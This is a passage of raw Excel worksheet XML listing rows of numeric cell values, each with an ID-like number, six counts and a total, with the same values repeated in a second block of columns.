        <v>24</v>
      </c>
      <c r="C702" s="8">
        <v>2</v>
      </c>
      <c r="D702" s="8">
        <v>15</v>
      </c>
      <c r="E702" s="8">
        <v>35</v>
      </c>
      <c r="F702" s="8">
        <v>12</v>
      </c>
      <c r="G702" s="8">
        <v>69</v>
      </c>
      <c r="H702" s="8">
        <v>157</v>
      </c>
      <c r="K702" s="7">
        <v>1742</v>
      </c>
      <c r="L702" s="8">
        <v>24</v>
      </c>
      <c r="M702" s="8">
        <v>2</v>
      </c>
      <c r="N702" s="8">
        <v>15</v>
      </c>
      <c r="O702" s="8">
        <v>35</v>
      </c>
      <c r="P702" s="8">
        <v>12</v>
      </c>
      <c r="Q702" s="8">
        <v>69</v>
      </c>
    </row>
    <row r="703" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A703" s="7">
        <v>1745</v>
      </c>
      <c r="B703" s="8">
        <v>26</v>
      </c>
      <c r="C703" s="8">
        <v>0</v>
      </c>
      <c r="D703" s="8">
        <v>15</v>
      </c>
      <c r="E703" s="8">
        <v>3</v>
      </c>
      <c r="F703" s="8">
        <v>3</v>
      </c>
      <c r="G703" s="8">
        <v>1</v>
      </c>
      <c r="H703" s="8">
        <v>48</v>
      </c>
      <c r="K703" s="7">
        <v>1745</v>
      </c>
      <c r="L703" s="8">
        <v>26</v>
      </c>
      <c r="M703" s="8">
        <v>0</v>
      </c>
      <c r="N703" s="8">
        <v>15</v>
      </c>
      <c r="O703" s="8">
        <v>3</v>
      </c>
      <c r="P703" s="8">
        <v>3</v>
      </c>
      <c r="Q703" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="704" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A704" s="7">
        <v>1746</v>
      </c>
      <c r="B704" s="8">
        <v>26</v>
      </c>
      <c r="C704" s="8">
        <v>3</v>
      </c>
      <c r="D704" s="8">
        <v>52</v>
      </c>
      <c r="E704" s="8">
        <v>2</v>
      </c>
      <c r="F704" s="8">
        <v>13</v>
      </c>
      <c r="G704" s="8">
        <v>2</v>
      </c>
      <c r="H704" s="8">
        <v>98</v>
      </c>
      <c r="K704" s="7">
        <v>1746</v>
      </c>
      <c r="L704" s="8">
        <v>26</v>
      </c>
      <c r="M704" s="8">
        <v>3</v>
      </c>
      <c r="N704" s="8">
        <v>52</v>
      </c>
      <c r="O704" s="8">
        <v>2</v>
      </c>
      <c r="P704" s="8">
        <v>13</v>
      </c>
      <c r="Q704" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="705" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A705" s="7">
        <v>1748</v>
      </c>
      <c r="B705" s="8">
        <v>26</v>
      </c>
      <c r="C705" s="8">
        <v>3</v>
      </c>
      <c r="D705" s="8">
        <v>1</v>
      </c>
      <c r="E705" s="8">
        <v>0</v>
      </c>
      <c r="F705" s="8">
        <v>23</v>
      </c>
      <c r="G705" s="8">
        <v>5</v>
      </c>
      <c r="H705" s="8">
        <v>58</v>
      </c>
      <c r="K705" s="7">
        <v>1748</v>
      </c>
      <c r="L705" s="8">
        <v>26</v>
      </c>
      <c r="M705" s="8">
        <v>3</v>
      </c>
      <c r="N705" s="8">
        <v>1</v>
      </c>
      <c r="O705" s="8">
        <v>0</v>
      </c>
      <c r="P705" s="8">
        <v>23</v>
      </c>
      <c r="Q705" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="706" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A706" s="7">
        <v>1749</v>
      </c>
      <c r="B706" s="8">
        <v>26</v>
      </c>
      <c r="C706" s="8">
        <v>2</v>
      </c>
      <c r="D706" s="8">
        <v>0</v>
      </c>
      <c r="E706" s="8">
        <v>0</v>
      </c>
      <c r="F706" s="8">
        <v>0</v>
      </c>
      <c r="G706" s="8">
        <v>0</v>
      </c>
      <c r="H706" s="8">
        <v>28</v>
      </c>
      <c r="K706" s="7">
        <v>1749</v>
      </c>
      <c r="L706" s="8">
        <v>26</v>
      </c>
      <c r="M706" s="8">
        <v>2</v>
      </c>
      <c r="N706" s="8">
        <v>0</v>
      </c>
      <c r="O706" s="8">
        <v>0</v>
      </c>
      <c r="P706" s="8">
        <v>0</v>
      </c>
      <c r="Q706" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="707" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A707" s="7">
        <v>1756</v>
      </c>
      <c r="B707" s="8">
        <v>26</v>
      </c>
      <c r="C707" s="8">
        <v>0</v>
      </c>
      <c r="D707" s="8">
        <v>5</v>
      </c>
      <c r="E707" s="8">
        <v>15</v>
      </c>
      <c r="F707" s="8">
        <v>7</v>
      </c>
      <c r="G707" s="8">
        <v>3</v>
      </c>
      <c r="H707" s="8">
        <v>56</v>
      </c>
      <c r="K707" s="7">
        <v>1756</v>
      </c>
      <c r="L707" s="8">
        <v>26</v>
      </c>
      <c r="M707" s="8">
        <v>0</v>
      </c>
      <c r="N707" s="8">
        <v>5</v>
      </c>
      <c r="O707" s="8">
        <v>15</v>
      </c>
      <c r="P707" s="8">
        <v>7</v>
      </c>
      <c r="Q707" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="708" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A708" s="7">
        <v>1758</v>
      </c>
      <c r="B708" s="8">
        <v>0</v>
      </c>
      <c r="C708" s="8">
        <v>0</v>
      </c>
      <c r="D708" s="8">
        <v>0</v>
      </c>
      <c r="E708" s="8">
        <v>0</v>
      </c>
      <c r="F708" s="8">
        <v>2</v>
      </c>
      <c r="G708" s="8">
        <v>4</v>
      </c>
      <c r="H708" s="8">
        <v>6</v>
      </c>
      <c r="K708" s="7">
        <v>1758</v>
      </c>
      <c r="L708" s="8">
        <v>0</v>
      </c>
      <c r="M708" s="8">
        <v>0</v>
      </c>
      <c r="N708" s="8">
        <v>0</v>
      </c>
      <c r="O708" s="8">
        <v>0</v>
      </c>
      <c r="P708" s="8">
        <v>2</v>
      </c>
      <c r="Q708" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="709" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A709" s="7">
        <v>1759</v>
      </c>
      <c r="B709" s="8">
        <v>6</v>
      </c>
      <c r="C709" s="8">
        <v>0</v>
      </c>
      <c r="D709" s="8">
        <v>0</v>
      </c>
      <c r="E709" s="8">
        <v>0</v>
      </c>
      <c r="F709" s="8">
        <v>4</v>
      </c>
      <c r="G709" s="8">
        <v>1</v>
      </c>
      <c r="H709" s="8">
        <v>11</v>
      </c>
      <c r="K709" s="7">
        <v>1759</v>
      </c>
      <c r="L709" s="8">
        <v>6</v>
      </c>
      <c r="M709" s="8">
        <v>0</v>
      </c>
      <c r="N709" s="8">
        <v>0</v>
      </c>
      <c r="O709" s="8">
        <v>0</v>
      </c>
      <c r="P709" s="8">
        <v>4</v>
      </c>
      <c r="Q709" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="710" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A710" s="7">
        <v>1764</v>
      </c>
      <c r="B710" s="8">
        <v>25</v>
      </c>
      <c r="C710" s="8">
        <v>1</v>
      </c>
      <c r="D710" s="8">
        <v>0</v>
      </c>
      <c r="E710" s="8">
        <v>0</v>
      </c>
      <c r="F710" s="8">
        <v>8</v>
      </c>
      <c r="G710" s="8">
        <v>23</v>
      </c>
      <c r="H710" s="8">
        <v>57</v>
      </c>
      <c r="K710" s="7">
        <v>1764</v>
      </c>
      <c r="L710" s="8">
        <v>25</v>
      </c>
      <c r="M710" s="8">
        <v>1</v>
      </c>
      <c r="N710" s="8">
        <v>0</v>
      </c>
      <c r="O710" s="8">
        <v>0</v>
      </c>
      <c r="P710" s="8">
        <v>8</v>
      </c>
      <c r="Q710" s="8">
        <v>23</v>
      </c>
    </row>
    <row r="711" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A711" s="7">
        <v>1767</v>
      </c>
      <c r="B711" s="8">
        <v>21</v>
      </c>
      <c r="C711" s="8">
        <v>1</v>
      </c>
      <c r="D711" s="8">
        <v>1</v>
      </c>
      <c r="E711" s="8">
        <v>17</v>
      </c>
      <c r="F711" s="8">
        <v>2</v>
      </c>
      <c r="G711" s="8">
        <v>3</v>
      </c>
      <c r="H711" s="8">
        <v>45</v>
      </c>
      <c r="K711" s="7">
        <v>1767</v>
      </c>
      <c r="L711" s="8">
        <v>21</v>
      </c>
      <c r="M711" s="8">
        <v>1</v>
      </c>
      <c r="N711" s="8">
        <v>1</v>
      </c>
      <c r="O711" s="8">
        <v>17</v>
      </c>
      <c r="P711" s="8">
        <v>2</v>
      </c>
      <c r="Q711" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="712" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A712" s="7">
        <v>1768</v>
      </c>
      <c r="B712" s="8">
        <v>0</v>
      </c>
      <c r="C712" s="8">
        <v>0</v>
      </c>
      <c r="D712" s="8">
        <v>4</v>
      </c>
      <c r="E712" s="8">
        <v>5</v>
      </c>
      <c r="F712" s="8">
        <v>9</v>
      </c>
      <c r="G712" s="8">
        <v>7</v>
      </c>
      <c r="H712" s="8">
        <v>25</v>
      </c>
      <c r="K712" s="7">
        <v>1768</v>
      </c>
      <c r="L712" s="8">
        <v>0</v>
      </c>
      <c r="M712" s="8">
        <v>0</v>
      </c>
      <c r="N712" s="8">
        <v>4</v>
      </c>
      <c r="O712" s="8">
        <v>5</v>
      </c>
      <c r="P712" s="8">
        <v>9</v>
      </c>
      <c r="Q712" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="713" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A713" s="7">
        <v>1771</v>
      </c>
      <c r="B713" s="8">
        <v>25</v>
      </c>
      <c r="C713" s="8">
        <v>1</v>
      </c>
      <c r="D713" s="8">
        <v>4</v>
      </c>
      <c r="E713" s="8">
        <v>5</v>
      </c>
      <c r="F713" s="8">
        <v>6</v>
      </c>
      <c r="G713" s="8">
        <v>6</v>
      </c>
      <c r="H713" s="8">
        <v>47</v>
      </c>
      <c r="K713" s="7">
        <v>1771</v>
      </c>
      <c r="L713" s="8">
        <v>25</v>
      </c>
      <c r="M713" s="8">
        <v>1</v>
      </c>
      <c r="N713" s="8">
        <v>4</v>
      </c>
      <c r="O713" s="8">
        <v>5</v>
      </c>
      <c r="P713" s="8">
        <v>6</v>
      </c>
      <c r="Q713" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="714" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A714" s="7">
        <v>1772</v>
      </c>
      <c r="B714" s="8">
        <v>6</v>
      </c>
      <c r="C714" s="8">
        <v>1</v>
      </c>
      <c r="D714" s="8">
        <v>6</v>
      </c>
      <c r="E714" s="8">
        <v>1</v>
      </c>
      <c r="F714" s="8">
        <v>1</v>
      </c>
      <c r="G714" s="8">
        <v>0</v>
      </c>
      <c r="H714" s="8">
        <v>15</v>
      </c>
      <c r="K714" s="7">
        <v>1772</v>
      </c>
      <c r="L714" s="8">
        <v>6</v>
      </c>
      <c r="M714" s="8">
        <v>1</v>
      </c>
      <c r="N714" s="8">
        <v>6</v>
      </c>
      <c r="O714" s="8">
        <v>1</v>
      </c>
      <c r="P714" s="8">
        <v>1</v>
      </c>
      <c r="Q714" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="715" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A715" s="7">
        <v>1776</v>
      </c>
      <c r="B715" s="8">
        <v>25</v>
      </c>
      <c r="C715" s="8">
        <v>0</v>
      </c>
      <c r="D715" s="8">
        <v>15</v>
      </c>
      <c r="E715" s="8">
        <v>65</v>
      </c>
      <c r="F715" s="8">
        <v>28</v>
      </c>
      <c r="G715" s="8">
        <v>48</v>
      </c>
      <c r="H715" s="8">
        <v>181</v>
      </c>
      <c r="K715" s="7">
        <v>1776</v>
      </c>
      <c r="L715" s="8">
        <v>25</v>
      </c>
      <c r="M715" s="8">
        <v>0</v>
      </c>
      <c r="N715" s="8">
        <v>15</v>
      </c>
      <c r="O715" s="8">
        <v>65</v>
      </c>
      <c r="P715" s="8">
        <v>28</v>
      </c>
      <c r="Q715" s="8">
        <v>48</v>
      </c>
    </row>
    <row r="716" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A716" s="7">
        <v>1777</v>
      </c>
      <c r="B716" s="8">
        <v>30</v>
      </c>
      <c r="C716" s="8">
        <v>0</v>
      </c>
      <c r="D716" s="8">
        <v>2</v>
      </c>
      <c r="E716" s="8">
        <v>0</v>
      </c>
      <c r="F716" s="8">
        <v>2</v>
      </c>
      <c r="G716" s="8">
        <v>0</v>
      </c>
      <c r="H716" s="8">
        <v>34</v>
      </c>
      <c r="K716" s="7">
        <v>1777</v>
      </c>
      <c r="L716" s="8">
        <v>30</v>
      </c>
      <c r="M716" s="8">
        <v>0</v>
      </c>
      <c r="N716" s="8">
        <v>2</v>
      </c>
      <c r="O716" s="8">
        <v>0</v>
      </c>
      <c r="P716" s="8">
        <v>2</v>
      </c>
      <c r="Q716" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="717" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A717" s="7">
        <v>1778</v>
      </c>
      <c r="B717" s="8">
        <v>30</v>
      </c>
      <c r="C717" s="8">
        <v>0</v>
      </c>
      <c r="D717" s="8">
        <v>0</v>
      </c>
      <c r="E717" s="8">
        <v>0</v>
      </c>
      <c r="F717" s="8">
        <v>4</v>
      </c>
      <c r="G717" s="8">
        <v>0</v>
      </c>
      <c r="H717" s="8">
        <v>34</v>
      </c>
      <c r="K717" s="7">
        <v>1778</v>
      </c>
      <c r="L717" s="8">
        <v>30</v>
      </c>
      <c r="M717" s="8">
        <v>0</v>
      </c>
      <c r="N717" s="8">
        <v>0</v>
      </c>
      <c r="O717" s="8">
        <v>0</v>
      </c>
      <c r="P717" s="8">
        <v>4</v>
      </c>
      <c r="Q717" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="718" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A718" s="7">
        <v>1779</v>
      </c>
      <c r="B718" s="8">
        <v>0</v>
      </c>
      <c r="C718" s="8">
        <v>0</v>
      </c>
      <c r="D718" s="8">
        <v>15</v>
      </c>
      <c r="E718" s="8">
        <v>30</v>
      </c>
      <c r="F718" s="8">
        <v>3</v>
      </c>
      <c r="G718" s="8">
        <v>4</v>
      </c>
      <c r="H718" s="8">
        <v>52</v>
      </c>
      <c r="K718" s="7">
        <v>1779</v>
      </c>
      <c r="L718" s="8">
        <v>0</v>
      </c>
      <c r="M718" s="8">
        <v>0</v>
      </c>
      <c r="N718" s="8">
        <v>15</v>
      </c>
      <c r="O718" s="8">
        <v>30</v>
      </c>
      <c r="P718" s="8">
        <v>3</v>
      </c>
      <c r="Q718" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="719" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A719" s="7">
        <v>1781</v>
      </c>
      <c r="B719" s="8">
        <v>25</v>
      </c>
      <c r="C719" s="8">
        <v>3</v>
      </c>
      <c r="D719" s="8">
        <v>33</v>
      </c>
      <c r="E719" s="8">
        <v>1</v>
      </c>
      <c r="F719" s="8">
        <v>49</v>
      </c>
      <c r="G719" s="8">
        <v>8</v>
      </c>
      <c r="H719" s="8">
        <v>119</v>
      </c>
      <c r="K719" s="7">
        <v>1781</v>
      </c>
      <c r="L719" s="8">
        <v>25</v>
      </c>
      <c r="M719" s="8">
        <v>3</v>
      </c>
      <c r="N719" s="8">
        <v>33</v>
      </c>
      <c r="O719" s="8">
        <v>1</v>
      </c>
      <c r="P719" s="8">
        <v>49</v>
      </c>
      <c r="Q719" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="720" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A720" s="7">
        <v>1783</v>
      </c>
      <c r="B720" s="8">
        <v>30</v>
      </c>
      <c r="C720" s="8">
        <v>0</v>
      </c>
      <c r="D720" s="8">
        <v>0</v>
      </c>
      <c r="E720" s="8">
        <v>0</v>
      </c>
      <c r="F720" s="8">
        <v>3</v>
      </c>
      <c r="G720" s="8">
        <v>0</v>
      </c>
      <c r="H720" s="8">
        <v>33</v>
      </c>
      <c r="K720" s="7">
        <v>1783</v>
      </c>
      <c r="L720" s="8">
        <v>30</v>
      </c>
      <c r="M720" s="8">
        <v>0</v>
      </c>
      <c r="N720" s="8">
        <v>0</v>
      </c>
      <c r="O720" s="8">
        <v>0</v>
      </c>
      <c r="P720" s="8">
        <v>3</v>
      </c>
      <c r="Q720" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="721" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A721" s="7">
        <v>1784</v>
      </c>
      <c r="B721" s="8">
        <v>30</v>
      </c>
      <c r="C721" s="8">
        <v>0</v>
      </c>
      <c r="D721" s="8">
        <v>1</v>
      </c>
      <c r="E721" s="8">
        <v>0</v>
      </c>
      <c r="F721" s="8">
        <v>4</v>
      </c>
      <c r="G721" s="8">
        <v>0</v>
      </c>
      <c r="H721" s="8">
        <v>35</v>
      </c>
      <c r="K721" s="7">
        <v>1784</v>
      </c>
      <c r="L721" s="8">
        <v>30</v>
      </c>
      <c r="M721" s="8">
        <v>0</v>
      </c>
      <c r="N721" s="8">
        <v>1</v>
      </c>
      <c r="O721" s="8">
        <v>0</v>
      </c>
      <c r="P721" s="8">
        <v>4</v>
      </c>
      <c r="Q721" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="722" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A722" s="7">
        <v>1785</v>
      </c>
      <c r="B722" s="8">
        <v>31</v>
      </c>
      <c r="C722" s="8">
        <v>0</v>
      </c>
      <c r="D722" s="8">
        <v>0</v>
      </c>
      <c r="E722" s="8">
        <v>35</v>
      </c>
      <c r="F722" s="8">
        <v>24</v>
      </c>
      <c r="G722" s="8">
        <v>72</v>
      </c>
      <c r="H722" s="8">
        <v>162</v>
      </c>
      <c r="K722" s="7">
        <v>1785</v>
      </c>
      <c r="L722" s="8">
        <v>31</v>
      </c>
      <c r="M722" s="8">
        <v>0</v>
      </c>
      <c r="N722" s="8">
        <v>0</v>
      </c>
      <c r="O722" s="8">
        <v>35</v>
      </c>
      <c r="P722" s="8">
        <v>24</v>
      </c>
      <c r="Q722" s="8">
        <v>72</v>
      </c>
    </row>
    <row r="723" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A723" s="7">
        <v>1789</v>
      </c>
      <c r="B723" s="8">
        <v>26</v>
      </c>
      <c r="C723" s="8">
        <v>1</v>
      </c>
      <c r="D723" s="8">
        <v>0</v>
      </c>
      <c r="E723" s="8">
        <v>0</v>
      </c>
      <c r="F723" s="8">
        <v>2</v>
      </c>
      <c r="G723" s="8">
        <v>5</v>
      </c>
      <c r="H723" s="8">
        <v>34</v>
      </c>
      <c r="K723" s="7">
        <v>1789</v>
      </c>
      <c r="L723" s="8">
        <v>26</v>
      </c>
      <c r="M723" s="8">
        <v>1</v>
      </c>
      <c r="N723" s="8">
        <v>0</v>
      </c>
      <c r="O723" s="8">
        <v>0</v>
      </c>
      <c r="P723" s="8">
        <v>2</v>
      </c>
      <c r="Q723" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="724" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A724" s="7">
        <v>1796</v>
      </c>
      <c r="B724" s="8">
        <v>30</v>
      </c>
      <c r="C724" s="8">
        <v>0</v>
      </c>
      <c r="D724" s="8">
        <v>1</v>
      </c>
      <c r="E724" s="8">
        <v>0</v>
      </c>
      <c r="F724" s="8">
        <v>4</v>
      </c>
      <c r="G724" s="8">
        <v>0</v>
      </c>
      <c r="H724" s="8">
        <v>35</v>
      </c>
      <c r="K724" s="7">
        <v>1796</v>
      </c>
      <c r="L724" s="8">
        <v>30</v>
      </c>
      <c r="M724" s="8">
        <v>0</v>
      </c>
      <c r="N724" s="8">
        <v>1</v>
      </c>
      <c r="O724" s="8">
        <v>0</v>
      </c>
      <c r="P724" s="8">
        <v>4</v>
      </c>
      <c r="Q724" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="725" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A725" s="7">
        <v>1799</v>
      </c>
      <c r="B725" s="8">
        <v>26</v>
      </c>
      <c r="C725" s="8">
        <v>1</v>
      </c>
      <c r="D725" s="8">
        <v>15</v>
      </c>
      <c r="E725" s="8">
        <v>17</v>
      </c>
      <c r="F725" s="8">
        <v>1</v>
      </c>
      <c r="G725" s="8">
        <v>2</v>
      </c>
      <c r="H725" s="8">
        <v>62</v>
      </c>
      <c r="K725" s="7">
        <v>1799</v>
      </c>
      <c r="L725" s="8">
        <v>26</v>
      </c>
      <c r="M725" s="8">
        <v>1</v>
      </c>
      <c r="N725" s="8">
        <v>15</v>
      </c>
      <c r="O725" s="8">
        <v>17</v>
      </c>
      <c r="P725" s="8">
        <v>1</v>
      </c>
      <c r="Q725" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="726" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A726" s="7">
        <v>1803</v>
      </c>
      <c r="B726" s="8">
        <v>26</v>
      </c>
      <c r="C726" s="8">
        <v>0</v>
      </c>
      <c r="D726" s="8">
        <v>0</v>
      </c>
      <c r="E726" s="8">
        <v>0</v>
      </c>
      <c r="F726" s="8">
        <v>5</v>
      </c>
      <c r="G726" s="8">
        <v>0</v>
      </c>
      <c r="H726" s="8">
        <v>31</v>
      </c>
      <c r="K726" s="7">
        <v>1803</v>
      </c>
      <c r="L726" s="8">
        <v>26</v>
      </c>
      <c r="M726" s="8">
        <v>0</v>
      </c>
      <c r="N726" s="8">
        <v>0</v>
      </c>
      <c r="O726" s="8">
        <v>0</v>
      </c>
      <c r="P726" s="8">
        <v>5</v>
      </c>
      <c r="Q726" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="727" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A727" s="7">
        <v>1804</v>
      </c>
      <c r="B727" s="8">
        <v>24</v>
      </c>
      <c r="C727" s="8">
        <v>2</v>
      </c>
      <c r="D727" s="8">
        <v>0</v>
      </c>
      <c r="E727" s="8">
        <v>0</v>
      </c>
      <c r="F727" s="8">
        <v>11</v>
      </c>
      <c r="G727" s="8">
        <v>4</v>
      </c>
      <c r="H727" s="8">
        <v>41</v>
      </c>
      <c r="K727" s="7">
        <v>1804</v>
      </c>
      <c r="L727" s="8">
        <v>24</v>
      </c>
      <c r="M727" s="8">
        <v>2</v>
      </c>
      <c r="N727" s="8">
        <v>0</v>
      </c>
      <c r="O727" s="8">
        <v>0</v>
      </c>
      <c r="P727" s="8">
        <v>11</v>
      </c>
      <c r="Q727" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="728" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A728" s="7">
        <v>1805</v>
      </c>
      <c r="B728" s="8">
        <v>26</v>
      </c>
      <c r="C728" s="8">
        <v>0</v>
      </c>
      <c r="D728" s="8">
        <v>7</v>
      </c>
      <c r="E728" s="8">
        <v>0</v>
      </c>
      <c r="F728" s="8">
        <v>1</v>
      </c>
      <c r="G728" s="8">
        <v>3</v>
      </c>
      <c r="H728" s="8">
        <v>37</v>
      </c>
      <c r="K728" s="7">
        <v>1805</v>
      </c>
      <c r="L728" s="8">
        <v>26</v>
      </c>
      <c r="M728" s="8">
        <v>0</v>
      </c>
      <c r="N728" s="8">
        <v>7</v>
      </c>
      <c r="O728" s="8">
        <v>0</v>
      </c>
      <c r="P728" s="8">
        <v>1</v>
      </c>
      <c r="Q728" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="729" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A729" s="7">
        <v>1808</v>
      </c>
      <c r="B729" s="8">
        <v>6</v>
      </c>
      <c r="C729" s="8">
        <v>2</v>
      </c>
      <c r="D729" s="8">
        <v>50</v>
      </c>
      <c r="E729" s="8">
        <v>280</v>
      </c>
      <c r="F729" s="8">
        <v>5</v>
      </c>
      <c r="G729" s="8">
        <v>2</v>
      </c>
      <c r="H729" s="8">
        <v>345</v>
      </c>
      <c r="K729" s="7">
        <v>1808</v>
      </c>
      <c r="L729" s="8">
        <v>6</v>
      </c>
      <c r="M729" s="8">
        <v>2</v>
      </c>
      <c r="N729" s="8">
        <v>50</v>
      </c>
      <c r="O729" s="8">
        <v>280</v>
      </c>
      <c r="P729" s="8">
        <v>5</v>
      </c>
      <c r="Q729" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="730" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A730" s="7">
        <v>1811</v>
      </c>
      <c r="B730" s="8">
        <v>30</v>
      </c>
      <c r="C730" s="8">
        <v>1</v>
      </c>
      <c r="D730" s="8">
        <v>0</v>
      </c>
      <c r="E730" s="8">
        <v>20</v>
      </c>
      <c r="F730" s="8">
        <v>24</v>
      </c>
      <c r="G730" s="8">
        <v>23</v>
      </c>
      <c r="H730" s="8">
        <v>98</v>
      </c>
      <c r="K730" s="7">
        <v>1811</v>
      </c>
      <c r="L730" s="8">
        <v>30</v>
      </c>
      <c r="M730" s="8">
        <v>1</v>
      </c>
      <c r="N730" s="8">
        <v>0</v>
      </c>
      <c r="O730" s="8">
        <v>20</v>
      </c>
      <c r="P730" s="8">
        <v>24</v>
      </c>
      <c r="Q730" s="8">
        <v>23</v>
      </c>
    </row>
    <row r="731" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A731" s="7">
        <v>1813</v>
      </c>
      <c r="B731" s="8">
        <v>30</v>
      </c>
      <c r="C731" s="8">
        <v>3</v>
      </c>
      <c r="D731" s="8">
        <v>0</v>
      </c>
      <c r="E731" s="8">
        <v>0</v>
      </c>
      <c r="F731" s="8">
        <v>40</v>
      </c>
      <c r="G731" s="8">
        <v>42</v>
      </c>
      <c r="H731" s="8">
        <v>115</v>
      </c>
      <c r="K731" s="7">
        <v>1813</v>
      </c>
      <c r="L731" s="8">
        <v>30</v>
      </c>
      <c r="M731" s="8">
        <v>3</v>
      </c>
      <c r="N731" s="8">
        <v>0</v>
      </c>
      <c r="O731" s="8">
        <v>0</v>
      </c>
      <c r="P731" s="8">
        <v>40</v>
      </c>
      <c r="Q731" s="8">
        <v>42</v>
      </c>
    </row>
    <row r="732" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A732" s="7">
        <v>1818</v>
      </c>
      <c r="B732" s="8">
        <v>24</v>
      </c>
      <c r="C732" s="8">
        <v>0</v>
      </c>
      <c r="D732" s="8">
        <v>5</v>
      </c>
      <c r="E732" s="8">
        <v>30</v>
      </c>
      <c r="F732" s="8">
        <v>0</v>
      </c>
      <c r="G732" s="8">
        <v>0</v>
      </c>
      <c r="H732" s="8">
        <v>59</v>
      </c>
      <c r="K732" s="7">
        <v>1818</v>
      </c>
      <c r="L732" s="8">
        <v>24</v>
      </c>
      <c r="M732" s="8">
        <v>0</v>
      </c>
      <c r="N732" s="8">
        <v>5</v>
      </c>
      <c r="O732" s="8">
        <v>30</v>
      </c>
      <c r="P732" s="8">
        <v>0</v>
      </c>
      <c r="Q732" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="733" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A733" s="7">
        <v>1821</v>
      </c>
      <c r="B733" s="8">
        <v>7</v>
      </c>
      <c r="C733" s="8">
        <v>1</v>
      </c>
      <c r="D733" s="8">
        <v>5</v>
      </c>
      <c r="E733" s="8">
        <v>0</v>
      </c>
      <c r="F733" s="8">
        <v>4</v>
      </c>
      <c r="G733" s="8">
        <v>1</v>
      </c>
      <c r="H733" s="8">
        <v>18</v>
      </c>
      <c r="K733" s="7">
        <v>1821</v>
      </c>
      <c r="L733" s="8">
        <v>7</v>
      </c>
      <c r="M733" s="8">
        <v>1</v>
      </c>
      <c r="N733" s="8">
        <v>5</v>
      </c>
      <c r="O733" s="8">
        <v>0</v>
      </c>
      <c r="P733" s="8">
        <v>4</v>
      </c>
      <c r="Q733" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="734" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A734" s="7">
        <v>1822</v>
      </c>
      <c r="B734" s="8">
        <v>0</v>
      </c>
      <c r="C734" s="8">
        <v>0</v>
      </c>
      <c r="D734" s="8">
        <v>0</v>
      </c>
      <c r="E734" s="8">
        <v>0</v>
      </c>
      <c r="F734" s="8">
        <v>0</v>
      </c>
      <c r="G734" s="8">
        <v>0</v>
      </c>
      <c r="H734" s="8">
        <v>0</v>
      </c>
      <c r="K734" s="7">
        <v>1822</v>
      </c>
      <c r="L734" s="8">
        <v>0</v>
      </c>
      <c r="M734" s="8">
        <v>0</v>
      </c>
      <c r="N734" s="8">
        <v>0</v>
      </c>
      <c r="O734" s="8">
        <v>0</v>
      </c>
      <c r="P734" s="8">
        <v>0</v>
      </c>
      <c r="Q734" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="735" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A735" s="7">
        <v>1823</v>
      </c>
      <c r="B735" s="8">
        <v>26</v>
      </c>
      <c r="C735" s="8">
        <v>1</v>
      </c>
      <c r="D735" s="8">
        <v>68</v>
      </c>
      <c r="E735" s="8">
        <v>71</v>
      </c>
      <c r="F735" s="8">
        <v>12</v>
      </c>
      <c r="G735" s="8">
        <v>9</v>
      </c>
      <c r="H735" s="8">
        <v>187</v>
      </c>
      <c r="K735" s="7">
        <v>1823</v>
      </c>
      <c r="L735" s="8">
        <v>26</v>
      </c>
      <c r="M735" s="8">
        <v>1</v>
      </c>
      <c r="N735" s="8">
        <v>68</v>
      </c>
      <c r="O735" s="8">
        <v>71</v>
      </c>
      <c r="P735" s="8">
        <v>12</v>
      </c>
      <c r="Q735" s="8">
        <v>9</v>
      </c>
    </row>
